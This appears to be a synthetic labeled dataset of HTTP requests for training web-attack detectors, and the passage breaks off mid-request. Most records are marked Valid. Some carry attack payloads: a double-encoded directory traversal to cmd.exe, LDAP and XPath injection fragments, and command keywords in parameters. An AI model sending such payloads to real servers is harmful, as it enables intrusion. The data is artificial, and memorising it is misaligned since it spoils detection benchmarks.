null

End - Id: 30314
Start - Id: 21619
class: Valid
GET /to3/ssnh5swuafnhsttLrtou.mdb?rtOdlix=46909105 HTTP/1.0
Host: 178.183.253.44
Connection: nimyd
Accept: application/zip;q=0.1, text/html;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, deflate;q=0.9, compress
Accept-Language: wEe9k7s-oyag5Ond, oiri8ed-f1dtd7;q=0.2, hoYiloi-sohhctlm;q=0.4
Cache-Control: apaet='Ly'
Client-ip: 125.106.235.5
Cookie: dGaa=l8IRitrmQv9otttom
Cookie2: $Version="682"
Date: Wed, 06 Jan 10 05:20:33 GMT
ETag: "7ly7eaghEhD_adE97d"
Expect: afae
From: tobWrwtn@esCei1hec.st
If-Modified-Since: Sat, 04 Aug 07 23:44:28 UTC
If-Unmodified-Since: Wed, 23 Aug 06 05:40:28 CET
If-Match: "3oeeskt-WNKglJ-HMu@"
If-None-Match: *
If-Range: "wX8XjCXFL@gPrntzp"
Max-Forwards: 45
MIME-Version: 5.4
Pragma: ifd='1ll35'
Proxy-Authorization: iene iujpu5o=8e5behlo
Authorization: NTLM aWhzcm43OGlSanJJbmx6YWV4aHRlUGhobmZzcWZ6emF0Y3BvZVlFbW5teTg=
Range: 6048-2960,4571-86
Referer: /Moerscc/mtser66/lb6eetaw/ozi4psi.conf
TE: chunked
Trailer: Accept-Encoding
User-Agent: eievei/9.5.6.7
UA-CPU: x86
UA-Disp: 198,1596,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 767x833
Via: 6.8 128.92.201.45, 2.0 www.aSpn0n.gif
Transfer-Encoding: compress
Upgrade: codse/2.4, Orte/3.9, dttr/7.6, cTjdn/1.0, iaatOs/2.1
Warning: 454 253.133.69.76 "ooerIseMeAi7r9coias" "Sat, 14 Oct 06 08:48:24 UTC"
X-Forwarded-For: 102.122.239.98
X-Serial-Number: 0418048557333038
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21619
Start - Id: 6396
class: Valid
POST /rj/iF/okXncyQDD_sG5bYfW/C.Rk@RTg45n/eTLiMW/LS3Zqcmd7kI/rNN_lO8o@A3q6.US8tF/jH/2YzT.u/35_cGUj@rHSNCvk.css? HTTP/1.0
Content-Length: 158
Content-Language: cRlsy
Content-Encoding: compress
Content-Location: /qcayno/soeWn/0fhof7sj/Dieett.css
Content-MD5: c3FkYW5pZXJlZnY5bnB1aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 27 Feb 05 09:03:00 UTC
Last-Modified: Sat, 08 Sep 07 04:53:05 GMT
Host: www.2enqikaioi.cz
Connection: 3scnitu
Accept: image/gif
Accept-Charset: windows-874;q=0.4, x-mac-cyrillic
Accept-Encoding: *
Accept-Language: iUseOmai-btryztD;q=0.6
Cache-Control: max-age=2235
Client-ip: 139.166.161.19
Cookie: nd9qTa=1308604806;eAseepi51iett=nor%|
Cookie2: $Version="97"
Date: Thu, 09 Sep 04 19:20:05 CET
ETag: W/"njaC28p2UpM0NDB6A"
Expect: 100-continue
From: dl4sbEq@atsb.fr
If-Modified-Since: Sat, 10 Oct 09 19:35:03 GMT
If-Unmodified-Since: Wed, 24 May 06 19:19:45 CET
If-Match: "U174q@aTHHQ2KUD"
If-None-Match: "CxxupJsWeTEVVVt"
If-Range: Sat, 17 Mar 07 02:09:00 UTC
Max-Forwards: 94
MIME-Version: 4.1
Pragma: hlultfyL='tn'
Proxy-Authorization: Digest nc=A75dbFB1
Authorization: NTLM Z2Vsd2ltb1F4dXRzOWh1QWRNcmNNYTBEZGdlc0FiZ2F1b3JlaXRhcnRrbnJl
Range: -46641,596587-2635,975-1
Referer: /RnIp/ib9Isit/4bafBf3/ttgie/ooe13aot.msf
TE: trailers,deflate,chunked
Trailer: Accept-Charset
User-Agent: Mozilla/6.9 (Machintosh; U; PPC Mac OS X 3.8; eu-de; rv:5.4.4) Gecko/74753381
UA-CPU: 68000
UA-Disp: 131,664,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4815x4543
Via: HTTP/7.2 145.9.164.238, 2.1 177.137.240.63:830
Transfer-Encoding: identity
Upgrade: wnlseg/9.9
Warning: 342 www.2r2t.tiff "caeriVie69to" 
X-Forwarded-For: 4.205.122.56
X-Serial-Number: 10020198390
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

G2uFbgsoundhlcsystemj=dschxhcs&wrw0ip=8554179&aeoil4em1hmylya=h54b&1peQpoollp=189257&tmke7e=sefJ7T&aoHlol=elsXNnN7F&ymua=iinsertlynE&itiu4l=heeeoauen4ce4tae2a

End - Id: 6396
Start - Id: 15247
class: Valid
GET /r8j0ah-jIeivQpFi/nC7.V9Yd/obis/MXhyjg@siaprocessing-instructionhMkP/e7AhrlHmk9ptT0tx/l7WIjZ6GNamQ.Q3Yh.gif? HTTP/1.0
Host: 212.202.150.52
Connection: 7TheldE4
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rnIPtt-yIedne;q=0.7, JgO-e;q=0.7, ReH4a-e0jaaPt;q=0.1, n-csq;q=0.1, asdY-ThT
Cache-Control: min-fresh=1
Client-ip: 216.194.155.178
Cookie: fesjyjwelo=we;korSGt=t2irut;passthrufnPRRCUiEf=s;mwMu=zptau2o;6srjjo6=ednwseo
Cookie2: $Version="12"
Date: Wed, 01 Aug 07 18:44:38 CET
ETag: W/"@PQZwevERhTi5Cop"
Expect: oerylfym=3lcly
From: aecg@hens.de
If-Modified-Since: Tue, 15 Jan 08 17:43:28 CET
If-Unmodified-Since: Mon, 01 Mar 10 01:49:12 UTC
If-Match: "Qlbebd3jO85cBQ_OPT"
If-None-Match: "cix7pR7M9vofj2ncK"
If-Range: Sat, 24 Apr 10 10:58:22 UTC
Max-Forwards: 0
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: vt6o Ret2w3r=bHEdy
Authorization: Basic ZWxoMTN4ZXI6MmhNeQ==
Range: 32-3322,6622-
Referer: /h7D5/oqnent.png
TE: chunked;q=0.7
Trailer: Accept-Language
User-Agent: Mozilla/1.5 (Machintosh; U; PPC 8.7; ee-gd; rv:2.7.2) Gecko/61858941
UA-CPU: MIPS
UA-Disp: 4833,791,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 175x9558
Via: 2.4 151.75.24.40:70, HTTP/1.3 99.213.192.75, 2.7 www.6pehe8e.shtml:886
Transfer-Encoding: fGitt
Upgrade: 3mbtt/4.9, e4asi/7.0
Warning: 629 www.ecbma.htm "smrFi67hp6Oamp" 
X-Forwarded-For: 231.138.207.226
X-Serial-Number: 82459741903687
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15247
Start - Id: 26161
class: Valid
GET /Asiaw/vvD6rasasoe60on/pSM/Rn3t6r78/o@AE@wM@Vp@N/4KMjbetween0mailGBqrW/0AKoVE.png?Xnrjwbtn4L=691748&Zmcel=9 HTTP/1.1
Host: www.aomtt.st
Connection: close
Accept: text/plain;q=0.5, audio/*;q=0.3, text/html;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: dwtd-nopb, omd-sv;q=0.3
Cache-Control: max-stale
Client-ip: 110.150.5.172
Cookie: crmtirasbuc8u=cDkn0Q;DWlQ-pa7GIZA=vyX5;niaecDias2td=inagtsmsu;drisvbe7mahem=a9passthruhsystemRer-r FcLdt;7iwLaheacritrtm=5185;uritnnmmx=6poiS/|ustdinhtaccess formlocationed&dh
Cookie2: $Version="87"
Date: Wed, 17 Nov 04 13:50:52 UTC
ETag: W/"9GWFxKBpXnAJdLqm"
Expect: 100-continue
From: dro4sne@hN7c.cz
If-Modified-Since: Sat, 02 Jun 07 05:33:18 CET
If-Unmodified-Since: Wed, 06 Sep 06 22:37:08 GMT
If-Match: *
If-None-Match: "EJ_FOjqybRbfdj0DP"
If-Range: Wed, 08 Dec 04 19:26:11 GMT
Max-Forwards: 899
MIME-Version: 2.2
Pragma: ht=tls
Proxy-Authorization: NTLM b3RnY291RWVubGUwdHplaGV1ZTd0dGF1emw2eW90MHRvcw==
Authorization: Digest opaque="Gonohwud"
Range: 0-357,4-25186
Referer: http://tstob.net/apR6d/yoma/geaadrb.jpg
TE: chunked,chunked,trailers
Trailer: Warning
User-Agent: 0nyrszdMpdE7raaNea
UA-CPU: 68000
UA-Disp: 484,285,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7580x3767
Via: HTTP/1.6 30.107.229.196
Transfer-Encoding: gzip
Upgrade: maeo2o/2.2, eosi/5.2
Warning: 243 215.45.32.215 "eictewu8s0mtw5" 
X-Forwarded-For: 61.241.105.229
X-Serial-Number: 77624336
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26161
Start - Id: 39112
class: LdapInjection
PUT /eihrehgtTdra8ag45s/alaisetr0on/qzuhbf_wEF@3j7g/h5poianeeesr6dxh/@D0HMrF1nW6.pl? HTTP/1.1
Content-Length: 239
Content-Language: etec,lvacnpo
Content-Encoding: gzip
Content-Location: /etm7iies/e7dp3/nCd9gtra/obres.pl
Content-MD5: dHlvZmR0ZWlIdG1lZGw1bA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Aug 04 05:18:56 CET
Host: www.rIeaontro.it
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-2
Accept-Encoding: 
Accept-Language: Y3suIe-ct, eHx-yxCtseoo;q=0.2, tss-NekbRhno;q=0.1, u9tn-d;q=0.8, e-hea;q=0.4
Cache-Control: ou=ooi
Cookie: urd=nzHe42lp;astgahaoeo=11;oneet3k=aepii)(&(objectClass    = Ess*);tl8iylctslr=t|;oRbtmEb12qttvkt=urw;lwm=clqdm
Cookie2: $Version="980"
Date: Wed, 13 Sep 06 13:16:36 CET
Expect: eueD
From: moUa@aWtec.biz
If-Unmodified-Since: Thu, 16 Sep 04 08:42:51 GMT
If-Match: "B0di3nGZIHqquOyR6X"
If-None-Match: *
If-Range: Tue, 09 Dec 08 13:43:59 GMT
Max-Forwards: 801
Range: 47027-28,-23
Referer: /Edrq/dzqo/oaJoorub/navZEewy/OeedRitl.shtml
TE: trailers
User-Agent: s8sze/8.1.4.1
UA-Color: color16
UA-Pixels: 7722x806
Via: 2.5 www.sanzqsd.jpg:461, FTP/5.1 www.teh3i9r.js, HTTP/0.2 www.Detaza.shtml
Transfer-Encoding: compress
Upgrade: qh5sne/2.6, 4nbgo/3.9, dnda/5.1
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oiasDprpl8i=sna&wts0goO=2eeii1e0cE&bmaatssf8tnsaiR=<puupdatei3ypst&suehiiustos8d=893&eorr7sygeANft=openoprocessing-instruction&apsab=ieYx\es&fsn9xs5n=twatreba2dla&ee1eoEiA=96&XQRVVwfXexec_m=3&Amah6etqr=s&ee=fgal&HEmernt=hmclus4ntAao5n0

End - Id: 39112
Start - Id: 8024
class: Valid
PUT /eoiiouwiwa3tsdde/aleeEolae/p4j/2Yle6uM@EV7O/qf5LZZ8MSaJqu/nhVyefL0kEo/M6sock_streamNhMK_aacceptZD1all/i0bv/njunTG0o9lnhstnbe.aspx? HTTP/1.0
Content-Length: 57
Content-Language: ENv,f,unslc
Content-Encoding: gzip
Content-Location: /reasfvT/stQsyf/nn5ie/e70r2.mpg
Content-MD5: Y2V1bmVtYW1nZXJhMW8wbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 03 Aug 04 01:07:38 UTC
Last-Modified: Sat, 06 Nov 04 19:17:23 GMT
Host: www.teticss.fr:711
Connection: close
Accept: video/*;q=0.8, application/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: hcmz-nx
Cache-Control: no-store
Client-ip: 101.169.46.30
Cookie: 9tnito7ot=91396002;oSt=tf ohuoe3Ii;VUhttpsQGsTDc=54
Cookie2: $Version="515"
Date: Mon, 14 May 07 21:48:43 GMT
ETag: "@2U8fqJAgF3_mYhH"
Expect: 100-continue
From: itepe@sh8wbe.it
If-Modified-Since: Mon, 09 Oct 06 19:52:33 UTC
If-Unmodified-Since: Mon, 27 Jun 05 22:16:36 UTC
If-Match: "EFRmo7naAewuzWGgB"
If-None-Match: *
If-Range: Mon, 30 Jul 07 05:32:00 CET
Max-Forwards: 84
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM dGJ0dHd1b1RvYW1pZmhsOWN5RW13bWRpZWI4YXN1M29v
Authorization: NTLM aW5lRWVlYXRhYVd1ZXJwMmVoZHRlNGFkYzhyaWVyeXN0bmNydG9lZWFzZ1NM
Range: 52356-4,-40250,02-
Referer: http://www.otlrn.de/tmdt/etohkrj/trnmeea/rt3os.dll
TE: chunked;q=0.2
Trailer: Accept
User-Agent: Mozilla/6.1 (compatible; MSIE 8.4; Open BSD i386; qsbiFa)
UA-CPU: x86
UA-Disp: 5540,780,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8622x900
Via: 5.4 www.uyuEbrt.htm, FTP/9.7 23.29.223.12
Transfer-Encoding: sscIe
Upgrade: tOtx/4.6, hie/5.3
Warning: 748 99.29.238.21 "Ia2eig" "Tue, 09 Sep 08 16:19:39 CET"
X-Forwarded-For: 243.241.144.79
X-Serial-Number: 8061292856047
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

nsap=iara&rs4pe2oeEre=7966983&teEirrhosD1e0=necstrfrbvtor

End - Id: 8024
Start - Id: 44485
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 62.209.23.97
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 29.10.71.191
Cookie: epevdnh6Litaerv=dvTdcWBzD;Scruoooo=stoSoaehae1;deTce252ako=oteincludeluRtd0dee>tChmo6
Cookie2: $Version="960"
Date: Wed, 06 May 09 20:11:09 CET
ETag: "iW-oDqyOW0NFzNS1j"
Expect: mnteO
From: cI4oaebh@nrntt4iEtl.fr
If-Modified-Since: Sat, 17 Sep 05 02:12:35 CET
If-Unmodified-Since: Mon, 07 Nov 05 15:48:12 CET
If-Match: "Lv-GiKHXnLvarAnG_CcE"
If-None-Match: "k6l2PoLg45XvUvT"
If-Range: Thu, 05 Jan 06 06:45:25 UTC
Max-Forwards: 056
MIME-Version: 9.7
Pragma: est01a=r
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Digest qop=auth-int
Range: 83215-
Referer: /aeern/aoaima3/fy4nrod/4eha/4qoodmho.asp
TE: gzip,trailers
Trailer: Via
User-Agent: Mozilla/8.7 (Machintosh; U; PPC 6.3; oS-aA; rv:8.4.4) Gecko/78368637
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 949x9593
Via: 9.5 www.ahbdsyg.jpeg, FTP/8.3 www.cgge1.css, HTTP/7.7 209.179.94.120
Transfer-Encoding: compress
Upgrade: et3/3.3, etd8ae/9.5
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44485
Start - Id: 48613
class: XPathInjection
POST /j9wexeyOjY/brRFJ/Hts1pt30E/vtmptXBMidLmochaRevTcD/-@jD/dmt/lenzHSi/hYX4IqjV.VOdiOlT2XL/xayoem.cgi? HTTP/1.0
Content-Length: 122
Content-Language: ah,a6
Content-Encoding: deflate
Content-Location: http://zmnoaa.org/usmiot/s7ne.cfm
Content-MD5: dHNGUG51Yml0eG1vb3NodQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Jul 06 17:00:26 UTC
Last-Modified: Tue, 25 Apr 06 24:02:44 CET
Host: 237.227.103.49
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: cp-936, x-mac-icelandic;q=0.3
Accept-Encoding: identity;q=0.6, compress;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 216.189.168.38
Cookie: sso=alyZPpBUO;C.CAqdwTYq5=ujtm3eera;eteuso9ogaesls=y3ggtsd;yltqxT=gZ6a
Cookie2: $Version="07"
Date: Sun, 11 Jul 04 24:50:17 CET
ETag: "007CfnUICLLd5nRJ01lX"
Expect: 100-continue
From: nhWtansu@esndihS5y.biz
If-Modified-Since: Sat, 12 Jan 08 13:28:14 GMT
If-Unmodified-Since: Wed, 05 Jan 05 10:37:36 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 674
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic ZWVpVDpoZGVvc0Fz
Authorization: Basic c3hjcHU6ZWUyYWVz
Range: 3-574
Referer: /nnuit/hrut/eGrn/6idr/bnItoty.exe
TE: trailers,gzip;q=0.9,trailers
Trailer: Referer
User-Agent: ttrt (rxdNCV; mpCbq3NdHJ; roYzSGM1)
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: fssdh/6.8 www.jmeetos.gif, y4STrI/4.2 26.62.232.149
Transfer-Encoding: deflate
Upgrade: 98segm/6.0, emke/7.4, V6urw/1.6, y7u/6.3, erasgo/2.6
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 3403720047412746
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

ACtErn4z=be1fu']  | P  |  //user[ name/text( )= 'dee3c&LeOLHS=i?riaoai&aabosntks=3t&tmrshginha=i

End - Id: 48613
Start - Id: 18655
class: Valid
GET /yqetentoTmIl9eln/nU_hKV-hkULSnSb3jM/PNGed9.yfbin/v8ZuWcfnyNg.jpg?hlcnsa15cegh4sl=ien&ced1eR8En=33480&1t=en&Mfc2IaSkM@=464&BtfrsrSelir=hoTddwlv8&HsaIrh=lU2e HTTP/1.0
Host: 147.70.5.86
Connection: keep-alive
Accept: video/mpeg;q=0.9, video/quicktime
Accept-Charset: isiri-3342;q=0.9, x-mac-roman;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.5
Cache-Control: max-age=77
Client-ip: 90.163.128.238
Cookie: zwindow.open8n=l4YN_jw;m2@7httpg1Bnull=l_O;lirjtvrvm0segT=o;iii2elo=t2t;aagiqph8dTdcc=j.lX2aznmJuc
Cookie2: $Version="42"
Date: Tue, 27 Apr 10 15:23:04 CET
ETag: W/"c.IlRfkBwNb-AJIHe"
Expect: Naud=docmmtt;rdrdTo
From: sue8eo@qtEnDQ2.de
If-Modified-Since: Wed, 13 Apr 05 03:00:20 GMT
If-Unmodified-Since: Sun, 11 Dec 05 15:39:04 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 14 Apr 07 18:46:11 GMT
Max-Forwards: 802
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest qop=oaskf
Authorization: NTLM YTM3cmhzdG5lYWlzYTV1ZTJ0YXR0bzY4OTNyZWUzVGFhOA==
Range: -0
Referer: http://www.tahbsmIe.com/eTlth4.html
TE: trailers
Trailer: Connection
User-Agent: Mozilla/3.2 (X11; U; Open BSD i386 0.6; Gn-7o; rv:1.5.0) Gecko/15759383
UA-CPU: StrongARM
UA-Disp: 7139,4412,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 542x850
Via: FTP/0.3 www.njeret.shtml, 9.1 www.todeOui.png, xt1/8.0 www.esrotgqn.jpeg:4700
Transfer-Encoding: gzip
Upgrade: TdUll/4.4
Warning: 599 248.78.6.97 "deo0tiacbum" 
X-Forwarded-For: 157.146.253.229
X-Serial-Number: 6772472077190177266
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18655
Start - Id: 25553
class: Valid
GET /8@G/ex/aiReogtjeetpvfrotd/dG1iI/useiOsosca0/gzX_NDEMk.6QPUFOfX5/sCecce/P5/eaobcyol9bioo/sS/8yE8x9GuGg7J.NkW.tiff?tued=in_Tw5k&ox=58939089&letleoe=+esni&BXWechootJ=49152&hreo8hstdn=el&i0=3119618247&xdcweaci=33&5b=ir6t4dr HTTP/1.1
Host: www.Atet.de:15
Connection: keep-alive
Accept: application/zip
Accept-Charset: iso-2022-jp, utf-8, koi8;q=0.2, macintosh, iso-8859-15;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 161.15.6.98
Cookie: r2usuSyEres=iiuw
Cookie2: $Version="669"
Date: Tue, 09 Jan 07 10:34:51 CET
ETag: "JjZIdriu4Zw-UJaDKt"
Expect: iorogo
From: iisl@HkElln.cz
If-Modified-Since: Sat, 12 Aug 06 14:35:09 GMT
If-Unmodified-Since: Mon, 05 Apr 04 21:19:30 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2207
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: ntlrt msoetln=heso
Authorization: she0tk Ctarti3o=uhrc
Range: 9-,-76849,526527-658
Referer: /qejauh/qhts5Se/lfaaxeO.php4
TE: trailers
Trailer: If-None-Match
User-Agent: sAmmeai0jtiIksnj
UA-CPU: 68000
UA-Disp: 0510,736,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 611x960
Via: 8.4 149.27.238.249, hndPt/7.7 249.42.115.247:83, 8.8 www.resddEy.png
Transfer-Encoding: identity
Upgrade: Hrmbnv/5.3, an6in/4.2
Warning: 142 222.56.226.72 "tngnIadabbtID" 
X-Forwarded-For: 161.67.138.114
X-Serial-Number: 5960932931614
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25553
Start - Id: 21261
class: Valid
GET /eEEern/lJlC/lKhtOp/kClkHOxaLlCLG-G44biV/IoerqwGbgeWn/eGShmPHk30gv93KEWMVA/al44sduAuyulhbdnkoiA/h9y0/9CpspUU/hnmiruii.tiff?ilIennQtOqodiz=c6RLniaadaw&jtC.MyS@8kJ=097286&neNPrrsnwrfenn0=el&ouzhMHa5=9837221&tuh=%5C%3E%2Fat&too=ehfP.bH&borehhan1hLetn4=3845&eeddT6eocitn=%3D%5Ct%3Ae+shutdownk+eoifdr&u7ateuhxo=9404805&otdtg=o4%40L4DvEt&lannrsene=cata&dyltettgn8=44822795&iglins8huFiHwt=ilPie HTTP/1.1
Host: 136.219.223.221
Connection: keep-alive
Accept: audio/*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: i-e1asm;q=0.8, ieo8dwb-em1te
Cache-Control: no-transform
Client-ip: 133.200.177.186
Cookie: ou=ulraWbB7;u9otaoP=7729;F9ott3diseand=t@eOhutyaab i~Tiz;gUaoensblldOfb=894088141;sryo8oegapnxi=orwa
Cookie2: $Version="9"
Date: Sat, 21 Jun 08 05:17:17 CET
ETag: W/"gMjAFm7vpncaZN10URyx"
Expect: 100-continue
From: aEie@aeme1v.biz
If-Modified-Since: Thu, 23 Nov 06 11:17:39 CET
If-Unmodified-Since: Sun, 11 Jan 04 19:53:56 GMT
If-Match: *
If-None-Match: "BN50VXNqOuniFcnG3J"
If-Range: Wed, 20 Apr 05 24:16:43 UTC
Max-Forwards: 805
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest username="ounet"
Authorization: Digest response="fc1A176a98c3BDe9BCF8f6F90C1BD322"
Range: 793-,8602-038713,9-
Referer: http://ndAt.com/wetii/9secku8.exe
TE: trailers
Trailer: Date
User-Agent: y4oH1TVqVz http://www.1oHaanW.biz
UA-CPU: PowerPC
UA-Disp: 664,7142,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8293x354
Via: 9.0 www.rybpurtr.css:5, 2.3 www.neddt8iE.gif
Transfer-Encoding: gzip
Upgrade: yyiKl/3.7, it7/7.9, ehn/2.1
Warning: 469 180.84.229.18 "oEiemdthie3uEjrey" "Sun, 17 Dec 06 24:08:21 CET"
X-Forwarded-For: 185.82.248.52
X-Serial-Number: 900444
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 21261
Start - Id: 14453
class: Valid
GET /e4zos.IKIGqWka1xm2zk.css?eeie=10092773&otdwsnnCeymtuut=locationoNs3rmleaBntralobject%40x&dfl=o&aoopeyhesurid=10&PVVfinput.4mLy.=94124393&r0yionottea=em+eg&uLuhA=2173710&divAIU=S1ontoaiez06aornms&eplhtcrJoralrf=ukC1l&tCsunrtokut1=r%3E%3FyUe3scriptEsumxdLqiin&e0meoslairlawe=8580730 HTTP/1.1
Host: www.edau.cz
Connection: sSeSiE
Accept: */*
Accept-Charset: iso-8859-9;q=0.8
Accept-Encoding: *
Accept-Language: s-es;q=0.2
Cache-Control: no-cache
Client-ip: 82.189.52.115
Cookie: 2zXVlscript2T%u=xoekiekai
Cookie2: $Version="059"
Date: Sat, 30 May 09 21:55:30 UTC
ETag: W/"jDK252a@c3hzQddGNCD"
Expect: 100-continue
From: inuozal@th8rsa.cz
If-Modified-Since: Wed, 15 Apr 09 09:27:33 CET
If-Unmodified-Since: Sun, 13 May 07 18:20:18 UTC
If-Match: *
If-None-Match: "ys32pmFs_h_BEyApBK"
If-Range: Fri, 14 Oct 05 06:19:41 CET
Max-Forwards: 781
MIME-Version: 2.3
Pragma: eArauH=arZ1iuHs
Proxy-Authorization: Basic b0x1ZmF3OmVvcmFhdEFO
Authorization: Digest nonce
Range: -517,627-,587-701
Referer: /staja/tiimoip/b5lbmw/ss1yhidc/gee6ro.tar
TE: gzip;q=0.9,deflate;q=0.7
Trailer: Date
User-Agent: Tmleu9wtdcmop
UA-CPU: 68000
UA-Disp: 854,140,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 5927x518
Via: HTTP/3.9 246.65.10.128
Transfer-Encoding: gzip
Upgrade: trkh/8.6, taslsi/0.6, se2/8.7, etaY/5.5, dpsae/7.4
Warning: 847 183.112.194.21 "jRtnvs4nlix" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 309851
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14453
Start - Id: 7043
class: Valid
POST /SexecVA7Hv9DWo/ojsrdSdbeH6sseianh/yr5tnnqoaiM9uleuees/s5xh5zndIu4uhi1rO/sFiB2Nq/ldJSOvD2zxbzkGoszI2q/iresleee/tOr@1dcTzY0Xr35I.aspx? HTTP/1.1
Content-Length: 236
Content-Language: Eooea5d,tdanu
Content-Encoding: gzip
Content-Location: /ntaa.asmx
Content-MD5: bmx3Y2lydXdUZWxzc1N0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Aug 06 18:57:41 CET
Last-Modified: Wed, 26 Jul 06 22:15:53 UTC
Host: www.e7edo.ch
Connection: daqx9
Accept: audio/x-wav
Accept-Charset: x-mac-turkish;q=0.9, euc-tw
Accept-Encoding: deflate;q=0.0, compress
Accept-Language: nedesn-tjgaTt;q=0.3, prithi-rrh;q=0.2, fsc9jga-buheiea, ss-r3patw2e;q=0.1, ee-ok;q=0.4
Cache-Control: max-stale=6448
Client-ip: 56.169.119.59
Cookie: pgn21bs1si=o7kNZfQKa
Cookie2: $Version="137"
Date: Sun, 18 Jan 09 23:45:54 UTC
ETag: "gaxc-0whZWjEnAG."
Expect: 100-continue
From: yfats@jmaNa.biz
If-Modified-Since: Wed, 23 Apr 08 16:31:02 UTC
If-Unmodified-Since: Fri, 26 Sep 08 08:29:27 GMT
If-Match: *
If-None-Match: "Pi1axnputWuaCiz."
If-Range: "ClrPMG9lWSGErasdOY"
Max-Forwards: 3
MIME-Version: 7.4
Pragma: sorefeb8=6ryecye
Proxy-Authorization: Basic RWlubnVhOmN0eDVs
Authorization: Basic c2Vlcjo3VmVCdGc=
Range: -251792
Referer: /lItk/eay2/dhlaO1n/ojtathi/jsEluO.php4
TE: chunked;q=0.5,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/8.4 (X11; U; Open BSD i586 1.7; ne-ce; rv:3.6.9) Gecko/91159227
UA-CPU: x86
UA-Disp: 1480,4443,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8498x1908
Via: 3.9 www.raugr.png, FTP/0.2 226.122.10.93, 3.8 164.8.123.137
Transfer-Encoding: compress
Upgrade: natsnn/3.2, frn/5.3, ftOtpa/1.1
Warning: 830 www.aaooog.jpg "hirstfhvo" 
X-Forwarded-For: 213.145.136.133
X-Serial-Number: 484018235309
----: --------------------------------------
~~~~~: ~~~~~~~~~~

hn=nWnerc+-se&ntiejCiotnisona=pkefoae7neigNi2e3&ikpsjrwif3=ow8&aHLNb4a=497890&sh1eie=4vh&1le=035&niicol9aedks=ojpDuT&unis06thgsihd=m&zgorcpBBsDept=nbnotoweyt1ie&usjihdecrieisea=Eqrus&2.1S7q=eit&insertGJunion9kdW=t3?&nrLO6MGy=2691200

End - Id: 7043
Start - Id: 12030
class: Valid
GET /vqq@ho/3I4Kxmlsa1oMDC6/T0cmXrWKJxoIposition/hfsdV/eGo_uPFQWvmimXFWbp.gif?kdLich=790&aiaFozLrniotha=%40tlinkdtdhd1et&Lm7LHTf=BrMlrOrpir&Eye=9579786750&Aa_fburd=mb&ds6ot=n%3Andnscnr&n0sn=ult&AhtA5etGc=82&eiitc7gullo6=dryAmtspeloa4rm&fSalligroup by=TtktcnIsoeenrgxz&slraim=rdt0_Iq HTTP/1.1
Host: www.esvftenas.com
Connection: ncta
Accept: image/gif, text/html;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: 
